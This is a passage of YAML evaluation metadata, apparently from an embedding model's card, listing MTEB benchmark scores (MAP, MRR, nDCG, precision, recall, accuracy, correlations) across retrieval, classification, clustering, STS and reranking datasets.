value: 47.41374999999999
- type: ndcg_at_1000
value: 49.5805
- type: ndcg_at_3
value: 37.52825
- type: ndcg_at_5
value: 39.83266666666667
- type: precision_at_1
value: 32.81875
- type: precision_at_10
value: 7.382416666666666
- type: precision_at_100
value: 1.1640833333333334
- type: precision_at_1000
value: 0.15383333333333335
- type: precision_at_3
value: 17.134166666666665
- type: precision_at_5
value: 12.174833333333336
- type: recall_at_1
value: 27.707749999999997
- type: recall_at_10
value: 53.945
- type: recall_at_100
value: 76.191
- type: recall_at_1000
value: 91.101
- type: recall_at_3
value: 40.39083333333334
- type: recall_at_5
value: 46.40083333333333
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackStatsRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 26.482
- type: map_at_10
value: 33.201
- type: map_at_100
value: 34.107
- type: map_at_1000
value: 34.197
- type: map_at_3
value: 31.174000000000003
- type: map_at_5
value: 32.279
- type: mrr_at_1
value: 29.908
- type: mrr_at_10
value: 36.235
- type: mrr_at_100
value: 37.04
- type: mrr_at_1000
value: 37.105
- type: mrr_at_3
value: 34.355999999999995
- type: mrr_at_5
value: 35.382999999999996
- type: ndcg_at_1
value: 29.908
- type: ndcg_at_10
value: 37.325
- type: ndcg_at_100
value: 41.795
- type: ndcg_at_1000
value: 44.105
- type: ndcg_at_3
value: 33.555
- type: ndcg_at_5
value: 35.266999999999996
- type: precision_at_1
value: 29.908
- type: precision_at_10
value: 5.721
- type: precision_at_100
value: 0.8630000000000001
- type: precision_at_1000
value: 0.11299999999999999
- type: precision_at_3
value: 14.008000000000001
- type: precision_at_5
value: 9.754999999999999
- type: recall_at_1
value: 26.482
- type: recall_at_10
value: 47.072
- type: recall_at_100
value: 67.27
- type: recall_at_1000
value: 84.371
- type: recall_at_3
value: 36.65
- type: recall_at_5
value: 40.774
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackTexRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 18.815
- type: map_at_10
value: 26.369999999999997
- type: map_at_100
value: 27.458
- type: map_at_1000
value: 27.588
- type: map_at_3
value: 23.990000000000002
- type: map_at_5
value: 25.345000000000002
- type: mrr_at_1
value: 22.953000000000003
- type: mrr_at_10
value: 30.342999999999996
- type: mrr_at_100
value: 31.241000000000003
- type: mrr_at_1000
value: 31.319000000000003
- type: mrr_at_3
value: 28.16
- type: mrr_at_5
value: 29.406
- type: ndcg_at_1
value: 22.953000000000003
- type: ndcg_at_10
value: 31.151
- type: ndcg_at_100
value: 36.309000000000005
- type: ndcg_at_1000
value: 39.227000000000004
- type: ndcg_at_3
value: 26.921
- type: ndcg_at_5
value: 28.938000000000002
- type: precision_at_1
value: 22.953000000000003
- type: precision_at_10
value: 5.602
- type: precision_at_100
value: 0.9530000000000001
- type: precision_at_1000
value: 0.13899999999999998
- type: precision_at_3
value: 12.606
- type: precision_at_5
value: 9.119
- type: recall_at_1
value: 18.815
- type: recall_at_10
value: 41.574
- type: recall_at_100
value: 64.84400000000001
- type: recall_at_1000
value: 85.406
- type: recall_at_3
value: 29.694
- type: recall_at_5
value: 34.935
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackUnixRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 27.840999999999998
- type: map_at_10
value: 36.797999999999995
- type: map_at_100
value: 37.993
- type: map_at_1000
value: 38.086999999999996
- type: map_at_3
value: 34.050999999999995
- type: map_at_5
value: 35.379
- type: mrr_at_1
value: 32.649
- type: mrr_at_10
value: 41.025
- type: mrr_at_100
value: 41.878
- type: mrr_at_1000
value: 41.929
- type: mrr_at_3
value: 38.573
- type: mrr_at_5
value: 39.715
- type: ndcg_at_1
value: 32.649
- type: ndcg_at_10
value: 42.142
- type: ndcg_at_100
value: 47.558
- type: ndcg_at_1000
value: 49.643
- type: ndcg_at_3
value: 37.12
- type: ndcg_at_5
value: 38.983000000000004
- type: precision_at_1
value: 32.649
- type: precision_at_10
value: 7.08
- type: precision_at_100
value: 1.1039999999999999
- type: precision_at_1000
value: 0.13899999999999998
- type: precision_at_3
value: 16.698
- type: precision_at_5
value: 11.511000000000001
- type: recall_at_1
value: 27.840999999999998
- type: recall_at_10
value: 54.245
- type: recall_at_100
value: 77.947
- type: recall_at_1000
value: 92.36999999999999
- type: recall_at_3
value: 40.146
- type: recall_at_5
value: 44.951
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackWebmastersRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 26.529000000000003
- type: map_at_10
value: 35.010000000000005
- type: map_at_100
value: 36.647
- type: map_at_1000
value: 36.857
- type: map_at_3
value: 31.968000000000004
- type: map_at_5
value: 33.554
- type: mrr_at_1
value: 31.818
- type: mrr_at_10
value: 39.550999999999995
- type: mrr_at_100
value: 40.54
- type: mrr_at_1000
value: 40.596
- type: mrr_at_3
value: 36.726
- type: mrr_at_5
value: 38.416
- type: ndcg_at_1
value: 31.818
- type: ndcg_at_10
value: 40.675
- type: ndcg_at_100
value: 46.548
- type: ndcg_at_1000
value: 49.126
- type: ndcg_at_3
value: 35.829
- type: ndcg_at_5
value: 38.0
- type: precision_at_1
value: 31.818
- type: precision_at_10
value: 7.826
- type: precision_at_100
value: 1.538
- type: precision_at_1000
value: 0.24
- type: precision_at_3
value: 16.601
- type: precision_at_5
value: 12.095
- type: recall_at_1
value: 26.529000000000003
- type: recall_at_10
value: 51.03
- type: recall_at_100
value: 77.556
- type: recall_at_1000
value: 93.804
- type: recall_at_3
value: 36.986000000000004
- type: recall_at_5
value: 43.096000000000004
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackWordpressRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 23.480999999999998
- type: map_at_10
value: 30.817
- type: map_at_100
value: 31.838
- type: map_at_1000
value: 31.932
- type: map_at_3
value: 28.011999999999997
- type: map_at_5
value: 29.668
- type: mrr_at_1
value: 25.323
- type: mrr_at_10
value: 33.072
- type: mrr_at_100
value: 33.926
- type: mrr_at_1000
value: 33.993
- type: mrr_at_3
value: 30.436999999999998
- type: mrr_at_5
value: 32.092
- type: ndcg_at_1
value: 25.323
- type: ndcg_at_10
value: 35.514
- type: ndcg_at_100
value: 40.489000000000004
- type: ndcg_at_1000
value: 42.908
- type: ndcg_at_3
value: 30.092000000000002
- type: ndcg_at_5
value: 32.989000000000004
- type: precision_at_1
value: 25.323
- type: precision_at_10
value: 5.545
- type: precision_at_100
value: 0.861
- type: precision_at_1000
value: 0.117
- type: precision_at_3
value: 12.446
- type: precision_at_5
value: 9.131
- type: recall_at_1
value: 23.480999999999998
- type: recall_at_10
value: 47.825
- type: recall_at_100
value: 70.652
- type: recall_at_1000
value: 88.612
- type: recall_at_3
value: 33.537
- type: recall_at_5
value: 40.542
- task:
type: Retrieval
dataset:
type: climate-fever
name: MTEB ClimateFEVER
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 13.333999999999998
- type: map_at_10
value: 22.524
- type: map_at_100
value: 24.506
- type: map_at_1000
value: 24.715
- type: map_at_3
value: 19.022
- type: map_at_5
value: 20.693
- type: mrr_at_1
value: 29.186
- type: mrr_at_10
value: 41.22
- type: mrr_at_100
value: 42.16
- type: mrr_at_1000
value: 42.192
- type: mrr_at_3
value: 38.013000000000005
- type: mrr_at_5
value: 39.704
- type: ndcg_at_1
value: 29.186
- type: ndcg_at_10
value: 31.167
- type: ndcg_at_100
value: 38.879000000000005
- type: ndcg_at_1000
value: 42.376000000000005
- type: ndcg_at_3
value: 25.817
- type: ndcg_at_5
value: 27.377000000000002
- type: precision_at_1
value: 29.186
- type: precision_at_10
value: 9.693999999999999
- type: precision_at_100
value: 1.8030000000000002
- type: precision_at_1000
value: 0.246
- type: precision_at_3
value: 19.11
- type: precision_at_5
value: 14.344999999999999
- type: recall_at_1
value: 13.333999999999998
- type: recall_at_10
value: 37.092000000000006
- type: recall_at_100
value: 63.651
- type: recall_at_1000
value: 83.05
- type: recall_at_3
value: 23.74
- type: recall_at_5
value: 28.655
- task:
type: Retrieval
dataset:
type: dbpedia-entity
name: MTEB DBPedia
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 9.151
- type: map_at_10
value: 19.653000000000002
- type: map_at_100
value: 28.053
- type: map_at_1000
value: 29.709000000000003
- type: map_at_3
value: 14.191
- type: map_at_5
value: 16.456
- type: mrr_at_1
value: 66.25
- type: mrr_at_10
value: 74.4
- type: mrr_at_100
value: 74.715
- type: mrr_at_1000
value: 74.726
- type: mrr_at_3
value: 72.417
- type: mrr_at_5
value: 73.667
- type: ndcg_at_1
value: 54.25
- type: ndcg_at_10
value: 40.77
- type: ndcg_at_100
value: 46.359
- type: ndcg_at_1000
value: 54.193000000000005
- type: ndcg_at_3
value: 44.832
- type: ndcg_at_5
value: 42.63
- type: precision_at_1
value: 66.25
- type: precision_at_10
value: 32.175
- type: precision_at_100
value: 10.668
- type: precision_at_1000
value: 2.067
- type: precision_at_3
value: 47.667
- type: precision_at_5
value: 41.3
- type: recall_at_1
value: 9.151
- type: recall_at_10
value: 25.003999999999998
- type: recall_at_100
value: 52.976
- type: recall_at_1000
value: 78.315
- type: recall_at_3
value: 15.487
- type: recall_at_5
value: 18.999
- task:
type: Classification
dataset:
type: mteb/emotion
name: MTEB EmotionClassification
config: default
split: test
revision: 4f58c6b202a23cf9a4da393831edf4f9183cad37
metrics:
- type: accuracy
value: 51.89999999999999
- type: f1
value: 46.47777925067403
- task:
type: Retrieval
dataset:
type: fever
name: MTEB FEVER
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 73.706
- type: map_at_10
value: 82.423
- type: map_at_100
value: 82.67999999999999
- type: map_at_1000
value: 82.694
- type: map_at_3
value: 81.328
- type: map_at_5
value: 82.001
- type: mrr_at_1
value: 79.613
- type: mrr_at_10
value: 87.07000000000001
- type: mrr_at_100
value: 87.169
- type: mrr_at_1000
value: 87.17
- type: mrr_at_3
value: 86.404
- type: mrr_at_5
value: 86.856
- type: ndcg_at_1
value: 79.613
- type: ndcg_at_10
value: 86.289
- type: ndcg_at_100
value: 87.201
- type: ndcg_at_1000
value: 87.428
- type: ndcg_at_3
value: 84.625
- type: ndcg_at_5
value: 85.53699999999999
- type: precision_at_1
value: 79.613
- type: precision_at_10
value: 10.399
- type: precision_at_100
value: 1.1079999999999999
- type: precision_at_1000
value: 0.11499999999999999
- type: precision_at_3
value: 32.473
- type: precision_at_5
value: 20.132
- type: recall_at_1
value: 73.706
- type: recall_at_10
value: 93.559
- type: recall_at_100
value: 97.188
- type: recall_at_1000
value: 98.555
- type: recall_at_3
value: 88.98700000000001
- type: recall_at_5
value: 91.373
- task:
type: Retrieval
dataset:
type: fiqa
name: MTEB FiQA2018
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 19.841
- type: map_at_10
value: 32.643
- type: map_at_100
value: 34.575
- type: map_at_1000
value: 34.736
- type: map_at_3
value: 28.317999999999998
- type: map_at_5
value: 30.964000000000002
- type: mrr_at_1
value: 39.660000000000004
- type: mrr_at_10
value: 48.620000000000005
- type: mrr_at_100
value: 49.384
- type: mrr_at_1000
value: 49.415
- type: mrr_at_3
value: 45.988
- type: mrr_at_5
value: 47.361
- type: ndcg_at_1
value: 39.660000000000004
- type: ndcg_at_10
value: 40.646
- type: ndcg_at_100
value: 47.657
- type: ndcg_at_1000
value: 50.428
- type: ndcg_at_3
value: 36.689
- type: ndcg_at_5
value: 38.211
- type: precision_at_1
value: 39.660000000000004
- type: precision_at_10
value: 11.235000000000001
- type: precision_at_100
value: 1.8530000000000002
- type: precision_at_1000
value: 0.23600000000000002
- type: precision_at_3
value: 24.587999999999997
- type: precision_at_5
value: 18.395
- type: recall_at_1
value: 19.841
- type: recall_at_10
value: 48.135
- type: recall_at_100
value: 74.224
- type: recall_at_1000
value: 90.826
- type: recall_at_3
value: 33.536
- type: recall_at_5
value: 40.311
- task:
type: Retrieval
dataset:
type: hotpotqa
name: MTEB HotpotQA
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 40.358
- type: map_at_10
value: 64.497
- type: map_at_100
value: 65.362
- type: map_at_1000
value: 65.41900000000001
- type: map_at_3
value: 61.06700000000001
- type: map_at_5
value: 63.317
- type: mrr_at_1
value: 80.716
- type: mrr_at_10
value: 86.10799999999999
- type: mrr_at_100
value: 86.265
- type: mrr_at_1000
value: 86.27
- type: mrr_at_3
value: 85.271
- type: mrr_at_5
value: 85.82499999999999
- type: ndcg_at_1
value: 80.716
- type: ndcg_at_10
value: 72.597
- type: ndcg_at_100
value: 75.549
- type: ndcg_at_1000
value: 76.61
- type: ndcg_at_3
value: 67.874
- type: ndcg_at_5
value: 70.655
- type: precision_at_1
value: 80.716
- type: precision_at_10
value: 15.148
- type: precision_at_100
value: 1.745
- type: precision_at_1000
value: 0.188
- type: precision_at_3
value: 43.597
- type: precision_at_5
value: 28.351
- type: recall_at_1
value: 40.358
- type: recall_at_10
value: 75.739
- type: recall_at_100
value: 87.259
- type: recall_at_1000
value: 94.234
- type: recall_at_3
value: 65.39500000000001
- type: recall_at_5
value: 70.878
- task:
type: Classification
dataset:
type: mteb/imdb
name: MTEB ImdbClassification
config: default
split: test
revision: 3d86128a09e091d6018b6d26cad27f2739fc2db7
metrics:
- type: accuracy
value: 90.80799999999998
- type: ap
value: 86.81350378180757
- type: f1
value: 90.79901248314215
- task:
type: Retrieval
dataset:
type: msmarco
name: MTEB MSMARCO
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 22.096
- type: map_at_10
value: 34.384
- type: map_at_100
value: 35.541
- type: map_at_1000
value: 35.589999999999996
- type: map_at_3
value: 30.496000000000002
- type: map_at_5
value: 32.718
- type: mrr_at_1
value: 22.750999999999998
- type: mrr_at_10
value: 35.024
- type: mrr_at_100
value: 36.125
- type: mrr_at_1000
value: 36.168
- type: mrr_at_3
value: 31.225
- type: mrr_at_5
value: 33.416000000000004
- type: ndcg_at_1
value: 22.750999999999998
- type: ndcg_at_10
value: 41.351
- type: ndcg_at_100
value: 46.92
- type: ndcg_at_1000
value: 48.111
- type: ndcg_at_3
value: 33.439
- type: ndcg_at_5
value: 37.407000000000004
- type: precision_at_1
value: 22.750999999999998
- type: precision_at_10
value: 6.564
- type: precision_at_100
value: 0.935
- type: precision_at_1000
value: 0.104
- type: precision_at_3
value: 14.288
- type: precision_at_5
value: 10.581999999999999
- type: recall_at_1
value: 22.096
- type: recall_at_10
value: 62.771
- type: recall_at_100
value: 88.529
- type: recall_at_1000
value: 97.55
- type: recall_at_3
value: 41.245
- type: recall_at_5
value: 50.788
- task:
type: Classification
dataset:
type: mteb/mtop_domain
name: MTEB MTOPDomainClassification (en)
config: en
split: test
revision: d80d48c1eb48d3562165c59d59d0034df9fff0bf
metrics:
- type: accuracy
value: 94.16780665754673
- type: f1
value: 93.96331194859894
- task:
type: Classification
dataset:
type: mteb/mtop_intent
name: MTEB MTOPIntentClassification (en)
config: en
split: test
revision: ae001d0e6b1228650b7bd1c2c65fb50ad11a8aba
metrics:
- type: accuracy
value: 76.90606475148198
- type: f1
value: 58.58344986604187
- task:
type: Classification
dataset:
type: mteb/amazon_massive_intent
name: MTEB MassiveIntentClassification (en)
config: en
split: test
revision: 31efe3c427b0bae9c22cbb560b8f15491cc6bed7
metrics:
- type: accuracy
value: 76.14660390047075
- type: f1
value: 74.31533923533614
- task:
type: Classification
dataset:
type: mteb/amazon_massive_scenario
name: MTEB MassiveScenarioClassification (en)
config: en
split: test
revision: 7d571f92784cd94a019292a1f45445077d0ef634
metrics:
- type: accuracy
value: 80.16139878950908
- type: f1
value: 80.18532656824924
- task:
type: Clustering
dataset:
type: mteb/medrxiv-clustering-p2p
name: MTEB MedrxivClusteringP2P
config: default
split: test
revision: e7a26af6f3ae46b30dde8737f02c07b1505bcc73
metrics:
- type: v_measure
value: 32.949880906135085
- task:
type: Clustering
dataset:
type: mteb/medrxiv-clustering-s2s
name: MTEB MedrxivClusteringS2S
config: default
split: test
revision: 35191c8c0dca72d8ff3efcd72aa802307d469663
metrics:
- type: v_measure
value: 31.56300351524862
- task:
type: Reranking
dataset:
type: mteb/mind_small
name: MTEB MindSmallReranking
config: default
split: test
revision: 3bdac13927fdc888b903db93b2ffdbd90b295a69
metrics:
- type: map
value: 31.196521894371315
- type: mrr
value: 32.22644231694389
- task:
type: Retrieval
dataset:
type: nfcorpus
name: MTEB NFCorpus
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 6.783
- type: map_at_10
value: 14.549000000000001
- type: map_at_100
value: 18.433
- type: map_at_1000
value: 19.949
- type: map_at_3
value: 10.936
- type: map_at_5
value: 12.514
- type: mrr_at_1
value: 47.368
- type: mrr_at_10
value: 56.42
- type: mrr_at_100
value: 56.908
- type: mrr_at_1000
value: 56.95
- type: mrr_at_3
value: 54.283
- type: mrr_at_5
value: 55.568
- type: ndcg_at_1
value: 45.666000000000004
- type: ndcg_at_10
value: 37.389
- type: ndcg_at_100
value: 34.253
- type: ndcg_at_1000
value: 43.059999999999995
- type: ndcg_at_3
value: 42.725
- type: ndcg_at_5
value: 40.193
- type: precision_at_1
value: 47.368
- type: precision_at_10
value: 27.988000000000003
- type: precision_at_100
value: 8.672
- type: precision_at_1000
value: 2.164
- type: precision_at_3
value: 40.248
- type: precision_at_5
value: 34.737
- type: recall_at_1
value: 6.783
- type: recall_at_10
value: 17.838
- type: recall_at_100
value: 33.672000000000004
- type: recall_at_1000
value: 66.166
- type: recall_at_3
value: 11.849
- type: recall_at_5
value: 14.205000000000002
- task:
type: Retrieval
dataset:
type: nq
name: MTEB NQ
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 31.698999999999998
- type: map_at_10
value: 46.556
- type: map_at_100
value: 47.652
- type: map_at_1000
value: 47.68
- type: map_at_3
value: 42.492000000000004
- type: map_at_5
value: 44.763999999999996
- type: mrr_at_1
value: 35.747
- type: mrr_at_10
value: 49.242999999999995
- type: mrr_at_100
value: 50.052
- type: mrr_at_1000
value: 50.068
- type: mrr_at_3
value: 45.867000000000004
- type: mrr_at_5
value: 47.778999999999996
- type: ndcg_at_1
value: 35.717999999999996
- type: ndcg_at_10
value: 54.14600000000001
- type: ndcg_at_100
value: 58.672999999999995
- type: ndcg_at_1000
value: 59.279
- type: ndcg_at_3
value: 46.407
- type: ndcg_at_5
value: 50.181
- type: precision_at_1
value: 35.717999999999996
- type: precision_at_10
value: 8.844000000000001
- type: precision_at_100
value: 1.139
- type: precision_at_1000
value: 0.12
- type: precision_at_3
value: 20.993000000000002
- type: precision_at_5
value: 14.791000000000002
- type: recall_at_1
value: 31.698999999999998
- type: recall_at_10
value: 74.693
- type: recall_at_100
value: 94.15299999999999
- type: recall_at_1000
value: 98.585
- type: recall_at_3
value: 54.388999999999996
- type: recall_at_5
value: 63.08200000000001
- task:
type: Retrieval
dataset:
type: quora
name: MTEB QuoraRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 71.283
- type: map_at_10
value: 85.24000000000001
- type: map_at_100
value: 85.882
- type: map_at_1000
value: 85.897
- type: map_at_3
value: 82.326
- type: map_at_5
value: 84.177
- type: mrr_at_1
value: 82.21000000000001
- type: mrr_at_10
value: 88.228
- type: mrr_at_100
value: 88.32
- type: mrr_at_1000
value: 88.32
- type: mrr_at_3
value: 87.323
- type: mrr_at_5
value: 87.94800000000001
- type: ndcg_at_1
value: 82.17999999999999
- type: ndcg_at_10
value: 88.9
- type: ndcg_at_100
value: 90.079
- type: ndcg_at_1000
value: 90.158
- type: ndcg_at_3
value: 86.18299999999999
- type: ndcg_at_5
value: 87.71799999999999
- type: precision_at_1
value: 82.17999999999999
- type: precision_at_10
value: 13.464
- type: precision_at_100
value: 1.533
- type: precision_at_1000
value: 0.157
- type: precision_at_3
value: 37.693
- type: precision_at_5
value: 24.792
- type: recall_at_1
value: 71.283
- type: recall_at_10
value: 95.742
- type: recall_at_100
value: 99.67200000000001
- type: recall_at_1000
value: 99.981
- type: recall_at_3
value: 87.888
- type: recall_at_5
value: 92.24
- task:
type: Clustering
dataset:
type: mteb/reddit-clustering
name: MTEB RedditClustering
config: default
split: test
revision: 24640382cdbf8abc73003fb0fa6d111a705499eb
metrics:
- type: v_measure
value: 56.24267063669042
- task:
type: Clustering
dataset:
type: mteb/reddit-clustering-p2p
name: MTEB RedditClusteringP2P
config: default
split: test
revision: 282350215ef01743dc01b456c7f5241fa8937f16
metrics:
- type: v_measure
value: 62.88056988932578
- task:
type: Retrieval
dataset:
type: scidocs
name: MTEB SCIDOCS
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 4.903
- type: map_at_10
value: 13.202
- type: map_at_100
value: 15.5
- type: map_at_1000
value: 15.870999999999999
- type: map_at_3
value: 9.407
- type: map_at_5
value: 11.238
- type: mrr_at_1
value: 24.2
- type: mrr_at_10
value: 35.867
- type: mrr_at_100
value: 37.001
- type: mrr_at_1000
value: 37.043
- type: mrr_at_3
value: 32.5
- type: mrr_at_5
value: 34.35
- type: ndcg_at_1
value: 24.2
- type: ndcg_at_10
value: 21.731
- type: ndcg_at_100
value: 30.7
- type: ndcg_at_1000
value: 36.618
- type: ndcg_at_3
value: 20.72
- type: ndcg_at_5
value: 17.954
- type: precision_at_1
value: 24.2
- type: precision_at_10
value: 11.33
- type: precision_at_100
value: 2.4410000000000003
- type: precision_at_1000
value: 0.386
- type: precision_at_3
value: 19.667
- type: precision_at_5
value: 15.86
- type: recall_at_1
value: 4.903
- type: recall_at_10
value: 22.962
- type: recall_at_100
value: 49.563
- type: recall_at_1000
value: 78.238
- type: recall_at_3
value: 11.953
- type: recall_at_5
value: 16.067999999999998
- task:
type: STS
dataset:
type: mteb/sickr-sts
name: MTEB SICK-R
config: default
split: test
revision: a6ea5a8cab320b040a23452cc28066d9beae2cee
metrics:
- type: cos_sim_pearson
value: 84.12694254604078
- type: cos_sim_spearman
value: 80.30141815181918
- type: euclidean_pearson
value: 81.34015449877128
- type: euclidean_spearman
value: 80.13984197010849
- type: manhattan_pearson
value: 81.31767068124086
- type: manhattan_spearman
value: 80.11720513114103
- task:
type: STS
dataset:
type: mteb/sts12-sts
name: MTEB STS12
config: default
split: test
revision: a0d554a64d88156834ff5ae9920b964011b16384
metrics:
- type: cos_sim_pearson
value: 86.13112984010417
- type: cos_sim_spearman
value: 78.03063573402875
- type: euclidean_pearson
value: 83.51928418844804
- type: euclidean_spearman
value: 78.4045235411144
- type: manhattan_pearson
value: 83.49981637388689
- type: manhattan_spearman
value: 78.4042575139372
- task:
type: STS
dataset:
type: mteb/sts13-sts
name: MTEB STS13
config: default
split: test
revision: 7e90230a92c190f1bf69ae9002b8cea547a64cca
metrics:
- type: cos_sim_pearson
value: 82.50327987379504
- type: cos_sim_spearman
value: 84.18556767756205
- type: euclidean_pearson
value: 82.69684424327679
- type: euclidean_spearman
value: 83.5368106038335
- type: manhattan_pearson
value: 82.57967581007374
- type: manhattan_spearman
value: 83.43009053133697
- task:
type: STS
dataset:
type: mteb/sts14-sts
name: MTEB STS14
config: default
split: test
revision: 6031580fec1f6af667f0bd2da0a551cf4f0b2375
metrics:
- type: cos_sim_pearson
value: 82.50756863007814
- type: cos_sim_spearman
value: 82.27204331279108
- type: euclidean_pearson
value: 81.39535251429741
- type: euclidean_spearman
value: 81.84386626336239
- type: manhattan_pearson
value: 81.34281737280695
- type: manhattan_spearman
value: 81.81149375673166
- task:
type: STS
dataset:
type: mteb/sts15-sts
name: MTEB STS15
config: default
split: test
revision: ae752c7c21bf194d8b67fd573edf7ae58183cbe3
metrics:
- type: cos_sim_pearson
value: 86.8727714856726
- type: cos_sim_spearman
value: 87.95738287792312
- type: euclidean_pearson
value: 86.62920602795887
- type: euclidean_spearman
value: 87.05207355381243
- type: manhattan_pearson
value: 86.53587918472225
- type: manhattan_spearman
value: 86.95382961029586
- task:
type: STS
dataset:
type: mteb/sts16-sts
name: MTEB STS16
config: default
split: test
revision: 4d8694f8f0e0100860b497b999b3dbed754a0513
metrics:
- type: cos_sim_pearson
value: 83.52240359769479
- type: cos_sim_spearman
value: 85.47685776238286
- type: euclidean_pearson
value: 84.25815333483058
- type: euclidean_spearman
value: 85.27415639683198
- type: manhattan_pearson
value: 84.29127757025637
- type: manhattan_spearman
value: 85.30226224917351
- task:
type: STS
dataset:
type: mteb/sts17-crosslingual-sts
name: MTEB STS17 (en-en)
config: en-en
split: test
revision: af5e6fb845001ecf41f4c1e033ce921939a2a68d
metrics:
- type: cos_sim_pearson
value: 86.42501708915708
- type: cos_sim_spearman
value: 86.42276182795041
- type: euclidean_pearson
value: 86.5408207354761
- type: euclidean_spearman
value: 85.46096321750838
- type: manhattan_pearson
value: 86.54177303026881
- type: manhattan_spearman
value: 85.50313151916117
- task:
type: STS
dataset:
type: mteb/sts22-crosslingual-sts
name: MTEB STS22 (en)
config: en
split: test
revision: 6d1ba47164174a496b7fa5d3569dae26a6813b80
metrics:
- type: cos_sim_pearson
value: 64.86521089250766
- type: cos_sim_spearman
value: 65.94868540323003
- type: euclidean_pearson
value: 67.16569626533084
- type: euclidean_spearman
value: 66.37667004134917
- type: manhattan_pearson
value: 67.1482365102333
- type: manhattan_spearman
value: 66.53240122580029
- task:
type: STS
dataset:
type: mteb/stsbenchmark-sts
name: MTEB STSBenchmark
config: default
split: test
revision: b0fddb56ed78048fa8b90373c8a3cfc37b684831
metrics:
- type: cos_sim_pearson
value: 84.64746265365318
- type: cos_sim_spearman
value: 86.41888825906786
- type: euclidean_pearson
value: 85.27453642725811
- type: euclidean_spearman
value: 85.94095796602544
- type: manhattan_pearson
value: 85.28643660505334
- type: manhattan_spearman
value: 85.95028003260744
- task:
type: Reranking
dataset:
type: mteb/scidocs-reranking
name: MTEB SciDocsRR
config: default
split: test
revision: d3c5e1fc0b855ab6097bf1cda04dd73947d7caab
metrics:
- type: map
value: 87.48903153618527
- type: mrr
value: 96.41081503826601
- task:
type: Retrieval
dataset:
type: scifact
name: MTEB SciFact
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 58.594
- type: map_at_10
value: 69.296
- type: map_at_100
value: 69.782
- type: map_at_1000
value: 69.795
- type: map_at_3
value: 66.23
- type: map_at_5
value: 68.293
- type: mrr_at_1
value: 61.667
- type: mrr_at_10
value: 70.339
- type: mrr_at_100
value: 70.708
- type: mrr_at_1000
value: 70.722
- type: mrr_at_3
value: 68.0
- type: mrr_at_5
value: 69.56700000000001
- type: ndcg_at_1
value: 61.667
- type: ndcg_at_10
value: 74.039
- type: ndcg_at_100
value: 76.103
- type: ndcg_at_1000
value: 76.47800000000001
- type: ndcg_at_3
value: 68.967
- type: ndcg_at_5
value: 71.96900000000001
- type: precision_at_1
value: 61.667
- type: precision_at_10
value: 9.866999999999999
- type: precision_at_100
value: 1.097
- type: precision_at_1000
value: 0.11299999999999999
- type: precision_at_3
value: 27.111
- type: precision_at_5
value: 18.2
- type: recall_at_1
value: 58.594
- type: recall_at_10
value: 87.422
- type: recall_at_100
value: 96.667
- type: recall_at_1000
value: 99.667
- type: recall_at_3
value: 74.217
- type: recall_at_5
value: 81.539
- task:
type: PairClassification
dataset:
type: mteb/sprintduplicatequestions-pairclassification
name: MTEB SprintDuplicateQuestions
config: default
split: test
revision: d66bd1f72af766a5cc4b0ca5e00c162f89e8cc46
metrics:
- type: cos_sim_accuracy
value: 99.85049504950496
- type: cos_sim_ap
value: 96.33111544137081
- type: cos_sim_f1
value: 92.35443037974684
- type: cos_sim_precision
value: 93.53846153846153
- type: cos_sim_recall
value: 91.2
- type: dot_accuracy
value: 99.82376237623762
- type: dot_ap
value: 95.38082527310888
- type: dot_f1
value: 90.90909090909092
- type: dot_precision
value: 92.90187891440502
- type: dot_recall
value: 89.0
- type: euclidean_accuracy
value: 99.84851485148515
- type: euclidean_ap
value: 96.32316003996347
- type: euclidean_f1
value: 92.2071392659628
- type: euclidean_precision
value: 92.71991911021233
- type: euclidean_recall
value: 91.7
- type: manhattan_accuracy
value: 99.84851485148515
- type: manhattan_ap
value: 96.3655668249217
- type: manhattan_f1
value: 92.18356026222895
- type: manhattan_precision
value: 92.98067141403867
- type: manhattan_recall
value: 91.4
- type: max_accuracy
value: 99.85049504950496
- type: max_ap
value: 96.3655668249217
- type: max_f1
value: 92.35443037974684
- task:
type: Clustering
dataset:
type: mteb/stackexchange-clustering
name: MTEB StackExchangeClustering
config: default
split: test
revision: 6cbc1f7b2bc0622f2e39d2c77fa502909748c259
metrics:
- type: v_measure
value: 65.94861371629051
- task:
type: Clustering
dataset:
type: mteb/stackexchange-clustering-p2p
name: MTEB StackExchangeClusteringP2P
config: default
split: test
revision: 815ca46b2622cec33ccafc3735d572c266efdb44
metrics:
- type: v_measure
value: 35.009430451385
- task:
type: Reranking
dataset:
type: mteb/stackoverflowdupquestions-reranking
name: MTEB StackOverflowDupQuestions
config: default
split: test
revision: e185fbe320c72810689fc5848eb6114e1ef5ec69
metrics:
- type: map
value: 54.61164066427969
- type: mrr
value: 55.49710603938544
- task:
type: Summarization
dataset:
type: mteb/summeval
name: MTEB SummEval
config: default
split: test
revision: cda12ad7615edc362dbf25a00fdd61d3b1eaf93c
metrics:
- type: cos_sim_pearson
value: 30.622620124907662
- type: cos_sim_spearman
value: 31.0678351356163
- type: dot_pearson
value: 30.863727693306814
- type: dot_spearman
value: 31.230306567021255
- task:
type: Retrieval
dataset:
type: trec-covid
name: MTEB TRECCOVID
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 0.22
- type: map_at_10
value: 2.011
- type: map_at_100
value: 10.974
- type: map_at_1000
value: 25.819
- type: map_at_3
value: 0.6649999999999999
